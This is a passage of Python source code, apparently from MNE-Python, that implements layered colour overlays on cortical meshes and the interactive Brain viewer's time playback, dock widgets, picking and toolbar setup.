= 10 # degrees per press class _Overlay(object): def __init__(self, scalars, colormap, rng, opacity, name): self._scalars = scalars self._colormap = colormap assert rng is not None self._rng = rng self._opacity = opacity self._name = name def to_colors(self): from .._3d import _get_cmap from matplotlib.colors import Colormap, ListedColormap if isinstance(self._colormap, str): cmap = _get_cmap(self._colormap) elif isinstance(self._colormap, Colormap): cmap = self._colormap else: cmap = ListedColormap( self._colormap / 255., name=str(type(self._colormap))) logger.debug( f'Color mapping {repr(self._name)} with {cmap.name} ' f'colormap and range {self._rng}') rng = self._rng assert rng is not None scalars = _norm(self._scalars, rng) colors = cmap(scalars) if self._opacity is not None: colors[:, 3] *= self._opacity return colors def _norm(x, rng): if rng[0] == rng[1]: factor = 1 if rng[0] == 0 else 1e-6 * rng[0] else: factor = rng[1] - rng[0] return (x - rng[0]) / factor class _LayeredMesh(object): def __init__(self, renderer, vertices, triangles, normals): self._renderer = renderer self._vertices = vertices self._triangles = triangles self._normals = normals self._polydata = None self._actor = None self._is_mapped = False self._current_colors = None self._cached_colors = None self._overlays = OrderedDict() self._default_scalars = np.ones(vertices.shape) self._default_scalars_name = 'Data' def map(self): kwargs = { "color": None, "pickable": True, "rgba": True, } mesh_data = self._renderer.mesh( x=self._vertices[:, 0], y=self._vertices[:, 1], z=self._vertices[:, 2], triangles=self._triangles, normals=self._normals, scalars=self._default_scalars, **kwargs ) self._actor, self._polydata = mesh_data self._is_mapped = True def _compute_over(self, B, A): assert A.ndim == B.ndim == 2 assert A.shape[1] == B.shape[1] == 4 A_w = A[:, 3:] # * 1 B_w = B[:, 3:] * (1 - A_w) C = A.copy() C[:, :3] *= A_w C[:, :3] += B[:, :3] * B_w C[:, 3:] += B_w C[:, :3] /= C[:, 3:] return np.clip(C, 0, 1, out=C) def _compose_overlays(self): B = cache = None for overlay in self._overlays.values(): A = overlay.to_colors() if B is None: B = A else: cache = B B = self._compute_over(cache, A) return B, cache def add_overlay(self, scalars, colormap, rng, opacity, name): overlay = _Overlay( scalars=scalars, colormap=colormap, rng=rng, opacity=opacity, name=name, ) self._overlays[name] = overlay colors = overlay.to_colors() if self._current_colors is None: self._current_colors = colors else: # save previous colors to cache self._cached_colors = self._current_colors self._current_colors = self._compute_over( self._cached_colors, colors) # apply the texture self._apply() def remove_overlay(self, names): to_update = False if not isinstance(names, list): names = [names] for name in names: if name in self._overlays: del self._overlays[name] to_update = True if to_update: self.update() def _apply(self): if self._current_colors is None or self._renderer is None: return self._renderer._set_mesh_scalars( mesh=self._polydata, scalars=self._current_colors, name=self._default_scalars_name, ) def update(self, colors=None): if colors is not None and self._cached_colors is not None: self._current_colors = self._compute_over( self._cached_colors, colors) else: self._current_colors, self._cached_colors = \ self._compose_overlays() self._apply() def _clean(self): mapper = self._actor.GetMapper() mapper.SetLookupTable(None) self._actor.SetMapper(None) self._actor = None self._polydata = None self._renderer = None def update_overlay(self, name, scalars=None, colormap=None, opacity=None, rng=None): overlay = self._overlays.get(name, None) if overlay is None: return if scalars is not None: overlay._scalars = scalars if colormap is not None: overlay._colormap = colormap if opacity is not None: overlay._opacity = opacity if rng is not None: overlay._rng = rng # partial update: use cache if possible if name == list(self._overlays.keys())[-1]: self.update(colors=overlay.to_colors()) else: # full update self.update() @fill_doc class Brain(object): """Class for visualizing a brain. .. warning:: The API for this class is not currently complete. We suggest using :meth:`mne.viz.plot_source_estimates` with the PyVista backend enabled to obtain a ``Brain`` instance. Parameters ---------- subject_id : str Subject name in Freesurfer subjects dir. hemi : str Hemisphere id (ie 'lh', 'rh', 'both', or 'split'). In the case of 'both', both hemispheres are shown in the same window. In the case of 'split' hemispheres are displayed side-by-side in different viewing panes. surf : str FreeSurfer surface mesh name (ie 'white', 'inflated', etc.). title : str Title for the window. cortex : str, list, dict Specifies how the cortical surface is rendered. Options: 1. The name of one of the preset cortex styles: ``'classic'`` (default), ``'high_contrast'``, ``'low_contrast'``, or ``'bone'``. 2. A single color-like argument to render the cortex as a single color, e.g. ``'red'`` or ``(0.1, 0.4, 1.)``. 3. A list of two color-like used to render binarized curvature values for gyral (first) and sulcal (second). regions, e.g., ``['red', 'blue']`` or ``[(1, 0, 0), (0, 0, 1)]``. 4. A dict containing keys ``'vmin', 'vmax', 'colormap'`` with values used to render the binarized curvature (where 0 is gyral, 1 is sulcal). .. versionchanged:: 0.24 Add support for non-string arguments. alpha : float in [0, 1] Alpha level to control opacity of the cortical surface. size : int | array-like, shape (2,) The size of the window, in pixels. can be one number to specify a square window, or a length-2 sequence to specify (width, height). background : tuple(int, int, int) The color definition of the background: (red, green, blue). foreground : matplotlib color Color of the foreground (will be used for colorbars and text). None (default) will use black or white depending on the value of ``background``. figure : list of Figure | None If None (default), a new window will be created with the appropriate views. subjects_dir : str | None If not None, this directory will be used as the subjects directory instead of the value set using the SUBJECTS_DIR environment variable. %(views)s offset : bool | str If True, shifts the right- or left-most x coordinate of the left and right surfaces, respectively, to be at zero. This is useful for viewing inflated surface where hemispheres typically overlap. Can be "auto" (default) use True with inflated surfaces and False otherwise (Default: 'auto'). Only used when ``hemi='both'``. .. versionchanged:: 0.23 Default changed to "auto". show_toolbar : bool If True, toolbars will be shown for each view. offscreen : bool If True, rendering will be done offscreen (not shown). Useful mostly for generating images or screenshots, but can be buggy. Use at your own risk. interaction : str Can be "trackball" (default) or "terrain", i.e. a turntable-style camera. units : str Can be 'm' or 'mm' (default). %(view_layout)s silhouette : dict | bool As a dict, it contains the ``color``, ``linewidth``, ``alpha`` opacity and ``decimate`` (level of decimation between 0 and 1 or None) of the brain's silhouette to display. If True, the default values are used and if False, no silhouette will be displayed. Defaults to False. theme : str | path-like Can be "auto" (default), "light", or "dark" or a path-like to a custom stylesheet. For Dark-Mode and automatic Dark-Mode-Detection, :mod:`qdarkstyle` respectively and `darkdetect <https://github.com/albertosottile/darkdetect>`__ is required. show : bool Display the window as soon as it is ready. Defaults to True. block : bool If True, start the Qt application event loop. Default to False. Attributes ---------- geo : dict A dictionary of PyVista surface objects for each hemisphere. overlays : dict The overlays. Notes ----- This table shows the capabilities of each Brain backend ("✓" for full support, and "-" for partial support): .. table:: :widths: auto +-------------------------------------+--------------+---------------+ | 3D function: | surfer.Brain | mne.viz.Brain | +=====================================+==============+===============+ | :meth:`add_annotation` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_foci` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_label` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_text` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`close` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | data | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | foci | ✓ | | +-------------------------------------+--------------+---------------+ | labels | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_data` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_labels` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_annotations` | - | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_text` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_image` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_movie` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`screenshot` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`show_view` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | TimeViewer | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`get_picked_points` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data(volume) <add_data>` | | ✓ | +-------------------------------------+--------------+---------------+ | view_layout | | ✓ | +-------------------------------------+--------------+---------------+ | flatmaps | | ✓ | +-------------------------------------+--------------+---------------+ | vertex picking | | ✓ | +-------------------------------------+--------------+---------------+ | label picking | | ✓ | +-------------------------------------+--------------+---------------+ """ def __init__(self, subject_id, hemi='both', surf='pial', title=None, cortex="classic", alpha=1.0, size=800, background="black", foreground=None, figure=None, subjects_dir=None, views='auto', offset='auto', show_toolbar=False, offscreen=False, interaction='trackball', units='mm', view_layout='vertical', silhouette=False, theme='auto', show=True, block=False): from ..backends.renderer import backend, _get_renderer if hemi is None: hemi = 'vol' hemi = self._check_hemi(hemi, extras=('both', 'split', 'vol')) if hemi in ('both', 'split'): self._hemis = ('lh', 'rh') else: assert hemi in ('lh', 'rh', 'vol') self._hemis = (hemi, ) self._view_layout = _check_option('view_layout', view_layout, ('vertical', 'horizontal')) if figure is not None and not isinstance(figure, int): backend._check_3d_figure(figure) if title is None: self._title = subject_id else: self._title = title self._interaction = 'trackball' self._bg_color = _to_rgb(background, name='background') if foreground is None: foreground = 'w' if sum(self._bg_color) < 2 else 'k' self._fg_color = _to_rgb(foreground, name='foreground') del background, foreground views = _check_views(surf, views, hemi) col_dict = dict(lh=1, rh=1, both=1, split=2, vol=1) shape = (len(views), col_dict[hemi]) if self._view_layout == 'horizontal': shape = shape[::-1] self._subplot_shape = shape size = tuple(np.atleast_1d(size).round(0).astype(int).flat) if len(size) not in (1, 2): raise ValueError('"size" parameter must be an int or length-2 ' 'sequence of ints.') size = size if len(size) == 2 else size * 2 # 1-tuple to 2-tuple subjects_dir = get_subjects_dir(subjects_dir) self.theme = theme self.time_viewer = False self._block = block self._hemi = hemi self._units = units self._alpha = float(alpha) self._subject_id = subject_id self._subjects_dir = subjects_dir self._views = views self._times = None self._vertex_to_label_id = dict() self._annotation_labels = dict() self._labels = {'lh': list(), 'rh': list()} self._unnamed_label_id = 0 # can only grow self._annots = {'lh': list(), 'rh': list()} self._layered_meshes = dict() self._actors = dict() self._elevation_rng = [15, 165] # range of motion of camera on theta self._lut_locked = None self._cleaned = False # default values for silhouette self._silhouette = { 'color': self._bg_color, 'line_width': 2, 'alpha': alpha, 'decimate': 0.9, } _validate_type(silhouette, (dict, bool), 'silhouette') if isinstance(silhouette, dict): self._silhouette.update(silhouette) self.silhouette = True else: self.silhouette = silhouette self._scalar_bar = None # for now only one time label can be added # since it is the same for all figures self._time_label_added = False # array of data used by TimeViewer self._data = {} self.geo = {} self.set_time_interpolation('nearest') geo_kwargs = self._cortex_colormap(cortex) # evaluate at the midpoint of the used colormap val = -geo_kwargs['vmin'] / (geo_kwargs['vmax'] - geo_kwargs['vmin']) self._brain_color = geo_kwargs['colormap'](val) # load geometry for one or both hemispheres as necessary _validate_type(offset, (str, bool), 'offset') if isinstance(offset, str): _check_option('offset', offset, ('auto',), extra='when str') offset = (surf in ('inflated', 'flat')) offset = None if (not offset or hemi != 'both') else 0.0 logger.debug(f'Hemi offset: {offset}') self._renderer = _get_renderer(name=self._title, size=size, bgcolor=self._bg_color, shape=shape, fig=figure) self._renderer._window_close_connect(self._clean) self._renderer._window_set_theme(theme) self.plotter = self._renderer.plotter self._setup_canonical_rotation() # plot hemis for h in ('lh', 'rh'): if h not in self._hemis: continue # don't make surface if not chosen # Initialize a Surface object as the geometry geo = _Surface(self._subject_id, h, surf, self._subjects_dir, offset, units=self._units, x_dir=self._rigid[0, :3]) # Load in the geometry and curvature geo.load_geometry() geo.load_curvature() self.geo[h] = geo for _, _, v in self._iter_views(h): if self._layered_meshes.get(h) is None: mesh = _LayeredMesh( renderer=self._renderer, vertices=self.geo[h].coords, triangles=self.geo[h].faces, normals=self.geo[h].nn, ) mesh.map() # send to GPU mesh.add_overlay( scalars=self.geo[h].bin_curv, colormap=geo_kwargs["colormap"], rng=[geo_kwargs["vmin"], geo_kwargs["vmax"]], opacity=alpha, name='curv', ) self._layered_meshes[h] = mesh # add metadata to the mesh for picking mesh._polydata._hemi = h else: actor = self._layered_meshes[h]._actor self._renderer.plotter.add_actor(actor, render=False) if self.silhouette: mesh = self._layered_meshes[h] self._renderer._silhouette( mesh=mesh._polydata, color=self._silhouette["color"], line_width=self._silhouette["line_width"], alpha=self._silhouette["alpha"], decimate=self._silhouette["decimate"], ) self._renderer.set_camera(update=False, reset_camera=False, **views_dicts[h][v]) self.interaction = interaction self._closed = False if show: self.show() # update the views once the geometry is all set for h in self._hemis: for ri, ci, v in self._iter_views(h): self.show_view(v, row=ri, col=ci, hemi=h) if surf == 'flat': self._renderer.set_interaction("rubber_band_2d") def _setup_canonical_rotation(self): from ...coreg import fit_matched_points, _trans_from_params self._rigid = np.eye(4) try: xfm = read_talxfm(self._subject_id, self._subjects_dir) except Exception: return # XYZ+origin + halfway pts_tal = np.concatenate([np.eye(4)[:, :3], np.eye(3) * 0.5]) pts_subj = apply_trans(invert_transform(xfm), pts_tal) # we fit with scaling enabled, but then discard it (we just need # the rigid-body components) params = fit_matched_points(pts_subj, pts_tal, scale=3, out='params') self._rigid[:] = _trans_from_params((True, True, False), params[:6]) def setup_time_viewer(self, time_viewer=True, show_traces=True): """Configure the time viewer parameters. Parameters ---------- time_viewer : bool If True, enable widgets interaction. Defaults to True. show_traces : bool If True, enable visualization of time traces. Defaults to True. Notes ----- The keyboard shortcuts are the following: '?': Display help window 'i': Toggle interface 's': Apply auto-scaling 'r': Restore original clim 'c': Clear all traces 'n': Shift the time forward by the playback speed 'b': Shift the time backward by the playback speed 'Space': Start/Pause playback 'Up': Decrease camera elevation angle 'Down': Increase camera elevation angle 'Left': Decrease camera azimuth angle 'Right': Increase camera azimuth angle """ from ..backends._utils import _qt_app_exec if self.time_viewer: return if not self._data: raise ValueError("No data to visualize. See ``add_data``.") self.time_viewer = time_viewer self.orientation = list(_lh_views_dict.keys()) self.default_smoothing_range = [-1, 15] # Default configuration self.playback = False self.visibility = False self.refresh_rate_ms = max(int(round(1000. / 60.)), 1) self.default_scaling_range = [0.2, 2.0] self.default_playback_speed_range = [0.01, 1] self.default_playback_speed_value = 0.01 self.default_status_bar_msg = "Press ? for help" self.default_label_extract_modes = { "stc": ["mean", "max"], "src": ["mean_flip", "pca_flip", "auto"], } self.default_trace_modes = ('vertex', 'label') self.annot = None self.label_extract_mode = None all_keys = ('lh', 'rh', 'vol') self.act_data_smooth = {key: (None, None) for key in all_keys} self.color_list = _get_color_list() # remove grey for better contrast on the brain self.color_list.remove("#7f7f7f") self.color_cycle = _ReuseCycle(self.color_list) self.mpl_canvas = None self.help_canvas = None self.rms = None self.picked_patches = {key: list() for key in all_keys} self.picked_points = {key: list() for key in all_keys} self.pick_table = dict() self._spheres = list() self._mouse_no_mvt = -1 self.callbacks = dict() self.widgets = dict() self.keys = ('fmin', 'fmid', 'fmax') # Derived parameters: self.playback_speed = self.default_playback_speed_value _validate_type(show_traces, (bool, str, 'numeric'), 'show_traces') self.interactor_fraction = 0.25 if isinstance(show_traces, str): self.show_traces = True self.separate_canvas = False self.traces_mode = 'vertex' if show_traces == 'separate': self.separate_canvas = True elif show_traces == 'label': self.traces_mode = 'label' else: assert show_traces == 'vertex' # guaranteed above else: if isinstance(show_traces, bool): self.show_traces = show_traces else: show_traces = float(show_traces) if not 0 < show_traces < 1: raise ValueError( 'show traces, if numeric, must be between 0 and 1, ' f'got {show_traces}') self.show_traces = True self.interactor_fraction = show_traces self.traces_mode = 'vertex' self.separate_canvas = False del show_traces self._configure_time_label() self._configure_scalar_bar() self._configure_shortcuts() self._configure_picking() self._configure_tool_bar() self._configure_dock() self._configure_menu() self._configure_status_bar() self._configure_playback() self._configure_help() # show everything at the end self.toggle_interface() self._renderer.show() # sizes could change, update views for hemi in ('lh', 'rh'): for ri, ci, v in self._iter_views(hemi): self.show_view(view=v, row=ri, col=ci) self._renderer._process_events() self._renderer._update() # finally, show the MplCanvas if self.show_traces: self.mpl_canvas.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @safe_event def _clean(self): # resolve the reference cycle self.clear_glyphs() self.remove_annotations() # clear init actors for hemi in self._hemis: self._layered_meshes[hemi]._clean() self._clear_callbacks() self._clear_widgets() if getattr(self, 'mpl_canvas', None) is not None: self.mpl_canvas.clear() if getattr(self, 'act_data_smooth', None) is not None: for key in list(self.act_data_smooth.keys()): self.act_data_smooth[key] = None # XXX this should be done in PyVista for renderer in self._renderer._all_renderers: renderer.RemoveAllLights() # app_window cannot be set to None because it is used in __del__ for key in ('lighting', 'interactor', '_RenderWindow'): setattr(self.plotter, key, None) # Qt LeaveEvent requires _Iren so we use _FakeIren instead of None # to resolve the ref to vtkGenericRenderWindowInteractor self.plotter._Iren = _FakeIren() if getattr(self.plotter, 'picker', None) is not None: self.plotter.picker = None # XXX end PyVista for key in ('plotter', 'window', 'dock', 'tool_bar', 'menu_bar', 'interactor', 'mpl_canvas', 'time_actor', 'picked_renderer', 'act_data_smooth', '_scalar_bar', 'actions', 'widgets', 'geo', '_data'): setattr(self, key, None) self._cleaned = True def toggle_interface(self, value=None): """Toggle the interface. Parameters ---------- value : bool | None If True, the widgets are shown and if False, they are hidden. If None, the state of the widgets is toggled. Defaults to None. """ if value is None: self.visibility = not self.visibility else: self.visibility = value # update tool bar and dock with self._renderer._window_ensure_minimum_sizes(): if self.visibility: self._renderer._dock_show() self._renderer._tool_bar_update_button_icon( name="visibility", icon_name="visibility_on") else: self._renderer._dock_hide() self._renderer._tool_bar_update_button_icon( name="visibility", icon_name="visibility_off") self._renderer._update() def apply_auto_scaling(self): """Detect automatically fitting scaling parameters.""" self._update_auto_scaling() def restore_user_scaling(self): """Restore original scaling parameters.""" self._update_auto_scaling(restore=True) def toggle_playback(self, value=None): """Toggle time playback. Parameters ---------- value : bool | None If True, automatic time playback is enabled and if False, it's disabled. If None, the state of time playback is toggled. Defaults to None. """ if value is None: self.playback = not self.playback else: self.playback = value # update tool bar icon if self.playback: self._renderer._tool_bar_update_button_icon( name="play", icon_name="pause") else: self._renderer._tool_bar_update_button_icon( name="play", icon_name="play") if self.playback: time_data = self._data['time'] max_time = np.max(time_data) if self._current_time == max_time: # start over self.set_time_point(0) # first index self._last_tick = time.time() def reset(self): """Reset view and time step.""" self.reset_view() max_time = len(self._data['time']) - 1 if max_time > 0: self.callbacks["time"]( self._data["initial_time_idx"], update_widget=True, ) self._renderer._update() def set_playback_speed(self, speed): """Set the time playback speed. Parameters ---------- speed : float The speed of the playback. """ self.playback_speed = speed @safe_event def _play(self): if self.playback: try: self._advance() except Exception: self.toggle_playback(value=False) raise def _advance(self): this_time = time.time() delta = this_time - self._last_tick self._last_tick = time.time() time_data = self._data['time'] times = np.arange(self._n_times) time_shift = delta * self.playback_speed max_time = np.max(time_data) time_point = min(self._current_time + time_shift, max_time) # always use linear here -- this does not determine the data # interpolation mode, it just finds where we are (in time) in # terms of the time indices idx = np.interp(time_point, time_data, times) self.callbacks["time"](idx, update_widget=True) if time_point == max_time: self.toggle_playback(value=False) def _configure_time_label(self): self.time_actor = self._data.get('time_actor') if self.time_actor is not None: self.time_actor.SetPosition(0.5, 0.03) self.time_actor.GetTextProperty().SetJustificationToCentered() self.time_actor.GetTextProperty().BoldOn() def _configure_scalar_bar(self): if self._scalar_bar is not None: self._scalar_bar.SetOrientationToVertical() self._scalar_bar.SetHeight(0.6) self._scalar_bar.SetWidth(0.05) self._scalar_bar.SetPosition(0.02, 0.2) def _configure_dock_time_widget(self, layout=None): len_time = len(self._data['time']) - 1 if len_time < 1: return layout = self._renderer.dock_layout if layout is None else layout hlayout = self._renderer._dock_add_layout(vertical=False) self.widgets["min_time"] = self._renderer._dock_add_label( value="-", layout=hlayout) self._renderer._dock_add_stretch(hlayout) self.widgets["current_time"] = self._renderer._dock_add_label( value="x", layout=hlayout) self._renderer._dock_add_stretch(hlayout) self.widgets["max_time"] = self._renderer._dock_add_label( value="+", layout=hlayout) self._renderer._layout_add_widget(layout, hlayout) min_time = float(self._data['time'][0]) max_time = float(self._data['time'][-1]) self.widgets["min_time"].set_value(f"{min_time: .3f}") self.widgets["max_time"].set_value(f"{max_time: .3f}") self.widgets["current_time"].set_value(f"{self._current_time: .3f}") def _configure_dock_playback_widget(self, name): layout = self._renderer._dock_add_group_box(name) len_time = len(self._data['time']) - 1 # Time widget if len_time < 1: self.callbacks["time"] = None self.widgets["time"] = None else: self.callbacks["time"] = TimeCallBack( brain=self, callback=self.plot_time_line, ) self.widgets["time"] = self._renderer._dock_add_slider( name="Time (s)", value=self._data['time_idx'], rng=[0, len_time], double=True, callback=self.callbacks["time"], compact=False, layout=layout, ) self.callbacks["time"].widget = self.widgets["time"] # Time labels if len_time < 1: self.widgets["min_time"] = None self.widgets["max_time"] = None self.widgets["current_time"] = None else: self._configure_dock_time_widget(layout) self.callbacks["time"].label = self.widgets["current_time"] # Playback speed widget if len_time < 1: self.callbacks["playback_speed"] = None self.widgets["playback_speed"] = None else: self.callbacks["playback_speed"] = SmartCallBack( callback=self.set_playback_speed, ) self.widgets["playback_speed"] = self._renderer._dock_add_spin_box( name="Speed", value=self.default_playback_speed_value, rng=self.default_playback_speed_range, callback=self.callbacks["playback_speed"], layout=layout, ) self.callbacks["playback_speed"].widget = \ self.widgets["playback_speed"] # Time label current_time = self._current_time assert current_time is not None # should never be the case, float time_label = self._data['time_label'] if callable(time_label): current_time = time_label(current_time) else: current_time = time_label if self.time_actor is not None: self.time_actor.SetInput(current_time) del current_time def _configure_dock_orientation_widget(self, name): layout = self._renderer._dock_add_group_box(name) # Renderer widget rends = [str(i) for i in range(len(self._renderer._all_renderers))] if len(rends) > 1: def select_renderer(idx): idx = int(idx) loc = self._renderer._index_to_loc(idx) self.plotter.subplot(*loc) self.callbacks["renderer"] = SmartCallBack( callback=select_renderer, ) self.widgets["renderer"] = self._renderer._dock_add_combo_box( name="Renderer", value="0", rng=rends, callback=self.callbacks["renderer"], layout=layout, ) self.callbacks["renderer"].widget = \ self.widgets["renderer"] # Use 'lh' as a reference for orientation for 'both' if self._hemi == 'both': hemis_ref = ['lh'] else: hemis_ref = self._hemis orientation_data = [None] * len(rends) for hemi in hemis_ref: for ri, ci, v in self._iter_views(hemi): idx = self._renderer._loc_to_index((ri, ci)) if v == 'flat': _data = None else: _data = dict(default=v, hemi=hemi, row=ri, col=ci) orientation_data[idx] = _data self.callbacks["orientation"] = ShowView( brain=self, data=orientation_data, ) self.widgets["orientation"] = self._renderer._dock_add_combo_box( name=None, value=self.orientation[0], rng=self.orientation, callback=self.callbacks["orientation"], layout=layout, ) def _configure_dock_colormap_widget(self, name): layout = self._renderer._dock_add_group_box(name) self._renderer._dock_add_label( value="min / mid / max", align=True, layout=layout, ) up = UpdateLUT(brain=self) for key in self.keys: hlayout = self._renderer._dock_add_layout(vertical=False) rng = _get_range(self) self.callbacks[key] = lambda value, key=key: up(**{key: value}) self.widgets[key] = self._renderer._dock_add_slider( name=None, value=self._data[key], rng=rng, callback=self.callbacks[key], double=True, layout=hlayout, ) self.widgets[f"entry_{key}"] = self._renderer._dock_add_spin_box( name=None, value=self._data[key], callback=self.callbacks[key], rng=rng, layout=hlayout, ) up.widgets[key] = [self.widgets[key], self.widgets[f"entry_{key}"]] self._renderer._layout_add_widget(layout, hlayout) # reset / minus / plus hlayout = self._renderer._dock_add_layout(vertical=False) self._renderer._dock_add_label( value="Rescale", align=True, layout=hlayout, ) self.widgets["reset"] = self._renderer._dock_add_button( name="↺", callback=self.restore_user_scaling, layout=hlayout, style='toolbutton', ) for key, char, val in (("fminus", "➖", 1.2 ** -0.25), ("fplus", "➕", 1.2 ** 0.25)): self.callbacks[key] = UpdateColorbarScale( brain=self, factor=val, ) self.widgets[key] = self._renderer._dock_add_button( name=char, callback=self.callbacks[key], layout=hlayout, style='toolbutton', ) self._renderer._layout_add_widget(layout, hlayout) # register colorbar slider representations widgets = {key: self.widgets[key] for key in self.keys} for name in ("fmin", "fmid", "fmax", "fminus", "fplus"): self.callbacks[name].widgets = widgets def _configure_dock_trace_widget(self, name): if not self.show_traces: return # do not show trace mode for volumes if (self._data.get('src', None) is not None and self._data['src'].kind == 'volume'): self._configure_vertex_time_course() return layout = self._renderer._dock_add_group_box(name) # setup candidate annots def _set_annot(annot): self.clear_glyphs() self.remove_labels() self.remove_annotations() self.annot = annot if annot == 'None': self.traces_mode = 'vertex' self._configure_vertex_time_course() else: self.traces_mode = 'label' self._configure_label_time_course() self._renderer._update() # setup label extraction parameters def _set_label_mode(mode): if self.traces_mode != 'label': return glyphs = copy.deepcopy(self.picked_patches) self.label_extract_mode = mode self.clear_glyphs() for hemi in self._hemis: for label_id in glyphs[hemi]: label = self._annotation_labels[hemi][label_id] vertex_id = label.vertices[0] self._add_label_glyph(hemi, None, vertex_id) self.mpl_canvas.axes.relim() self.mpl_canvas.axes.autoscale_view() self.mpl_canvas.update_plot() self._renderer._update() from ...source_estimate import _get_allowed_label_modes from ...label import _read_annot_cands dir_name = op.join(self._subjects_dir, self._subject_id, 'label') cands = _read_annot_cands(dir_name, raise_error=False) cands = cands + ['None'] self.annot = cands[0] stc = self._data["stc"] modes = _get_allowed_label_modes(stc) if self._data["src"] is None: modes = [m for m in modes if m not in self.default_label_extract_modes["src"]] self.label_extract_mode = modes[-1] if self.traces_mode == 'vertex': _set_annot('None') else: _set_annot(self.annot) self.widgets["annotation"] = self._renderer._dock_add_combo_box( name="Annotation", value=self.annot, rng=cands, callback=_set_annot, layout=layout, ) self.widgets["extract_mode"] = self._renderer._dock_add_combo_box( name="Extract mode", value=self.label_extract_mode, rng=modes, callback=_set_label_mode, layout=layout, ) def _configure_dock(self): self._renderer._dock_initialize() self._configure_dock_playback_widget(name="Playback") self._configure_dock_orientation_widget(name="Orientation") self._configure_dock_colormap_widget(name="Color Limits") self._configure_dock_trace_widget(name="Trace") # Smoothing widget self.callbacks["smoothing"] = SmartCallBack( callback=self.set_data_smoothing, ) self.widgets["smoothing"] = self._renderer._dock_add_spin_box( name="Smoothing", value=self._data['smoothing_steps'], rng=self.default_smoothing_range, callback=self.callbacks["smoothing"], double=False ) self.callbacks["smoothing"].widget = \ self.widgets["smoothing"] self._renderer._dock_finalize() def _configure_playback(self): self._renderer._playback_initialize( func=self._play, timeout=self.refresh_rate_ms, value=self._data['time_idx'], rng=[0, len(self._data['time']) - 1], time_widget=self.widgets["time"], play_widget=self.widgets["play"], ) def _configure_mplcanvas(self): # Get the fractional components for the brain and mpl self.mpl_canvas = self._renderer._window_get_mplcanvas( brain=self, interactor_fraction=self.interactor_fraction, show_traces=self.show_traces, separate_canvas=self.separate_canvas ) xlim = [np.min(self._data['time']), np.max(self._data['time'])] with warnings.catch_warnings(): warnings.filterwarnings("ignore", category=UserWarning) self.mpl_canvas.axes.set(xlim=xlim) if not self.separate_canvas: self._renderer._window_adjust_mplcanvas_layout() self.mpl_canvas.set_color( bg_color=self._bg_color, fg_color=self._fg_color, ) def _configure_vertex_time_course(self): if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() # plot RMS of the activation y = np.concatenate(list(v[0] for v in self.act_data_smooth.values() if v[0] is not None)) rms = np.linalg.norm(y, axis=0) / np.sqrt(len(y)) del y self.rms, = self.mpl_canvas.axes.plot( self._data['time'], rms, lw=3, label='RMS', zorder=3, color=self._fg_color, alpha=0.5, ls=':') # now plot the time line self.plot_time_line(update=False) # then the picked points for idx, hemi in enumerate(['lh', 'rh', 'vol']): act_data = self.act_data_smooth.get(hemi, [None])[0] if act_data is None: continue hemi_data = self._data[hemi] vertices = hemi_data['vertices'] # simulate a picked renderer if self._hemi in ('both', 'rh') or hemi == 'vol': idx = 0 self.picked_renderer = self._renderer._all_renderers[idx] # initialize the default point if self._data['initial_time'] is not None: # pick at that time use_data = act_data[ :, [np.round(self._data['time_idx']).astype(int)]] else: use_data = act_data ind = np.unravel_index(np.argmax(np.abs(use_data), axis=None), use_data.shape) if hemi == 'vol': mesh = hemi_data['grid'] else: mesh = self._layered_meshes[hemi]._polydata vertex_id = vertices[ind[0]] self._add_vertex_glyph(hemi, mesh, vertex_id, update=False) def _configure_picking(self): # get data for each hemi from scipy import sparse for idx, hemi in enumerate(['vol', 'lh', 'rh']): hemi_data = self._data.get(hemi) if hemi_data is not None: act_data = hemi_data['array'] if act_data.ndim == 3: act_data = np.linalg.norm(act_data, axis=1) smooth_mat = hemi_data.get('smooth_mat') vertices = hemi_data['vertices'] if hemi == 'vol': assert smooth_mat is None smooth_mat = sparse.csr_matrix( (np.ones(len(vertices)), (vertices, np.arange(len(vertices))))) self.act_data_smooth[hemi] = (act_data, smooth_mat) self._renderer._update_picking_callback( self._on_mouse_move, self._on_button_press, self._on_button_release, self._on_pick ) def _configure_tool_bar(self): self._renderer._tool_bar_load_icons() self._renderer._tool_bar_set_theme(self.theme) self._renderer._tool_bar_initialize(name="Toolbar") self._renderer._tool_bar_add_file_button( name="screenshot", desc="Take a screenshot", func=self.save_image, ) self._renderer._tool_bar_add_file_button( name="movie", desc="Save movie...", func=lambda filename: self.save_movie( filename=filename, time_dilation=(1. / self.playback_speed)), shortcut="ctrl+shift+s", ) 